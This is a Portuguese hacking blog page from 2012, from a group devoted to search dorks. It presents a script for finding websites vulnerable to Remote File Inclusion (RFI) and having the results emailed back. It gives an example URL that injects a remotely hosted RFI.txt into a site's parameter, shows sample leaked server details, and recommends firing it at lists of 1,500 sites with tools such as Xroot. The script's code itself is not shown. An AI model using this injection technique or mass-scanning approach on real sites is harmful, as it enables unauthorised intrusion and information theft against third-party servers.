#---------------------------------------------------------------------#
# Procurar arquivos web com códigos potencialmente malicioso #
#---------------------------------------------------------------------#
Advanced Search, Applied through dorks ("set of search operators."), Capture sensitive information, failures in servers. Group aimed at advanced filters to search engines & Digital Security Research.
Parceiro: Camisetas Hacker
Mostrando postagens com marcador codigo. Mostrar todas as postagens
Mostrando postagens com marcador codigo. Mostrar todas as postagens
sexta-feira, 23 de novembro de 2012
segunda-feira, 27 de agosto de 2012
Script Para teste RFI vulneráveis enviados para Email.
Pode ser usada em Bot Scanner, Xroot e outros programas que simulação alguma requisição http assim injetando o script na URL. já testa e envia pro Email.
Quem já usou o Xroot sabe como usar, Ou até mesmo um simples script de Spammer.
Exemplo:http://www.sitevul.com.br/index.php?id=http://script.com/RFI.txt?
Chegara da seguinte forma no seu email:
Nome: Linux a1-whl-a79.host.teste 2.6.18-194.32.1.el5 #1 SMP Fri Jan 7 11:50:24 BRST 2011 x86_64
Safe Mode:Off
URL: www.sitevul.com.br/index.php?id=http://script.com/RFI.txt?
Data: 07-31-33, 27-08-12, 3131 3133 1 Monpm12 239
Caminho: /home/sitevull/public_html/index.php
System: Linux a1-whl-a79.host.teste 2.6.18-194.32.1.el5 #1 SMP Fri Jan 7 11:50:24 BRST 2011 x86_64
Imagina testar isso um por um com lista de 1500 sites.
Dica use o Xroot ou outro programa que simule uma requisição HTTP pra injetar o script na Get do site:
OBS: procure a variável chamada Email troque o valor fixo que seria meu Email pelo seu.
Code:
sexta-feira, 10 de agosto de 2012
Assinar:
Postagens (Atom)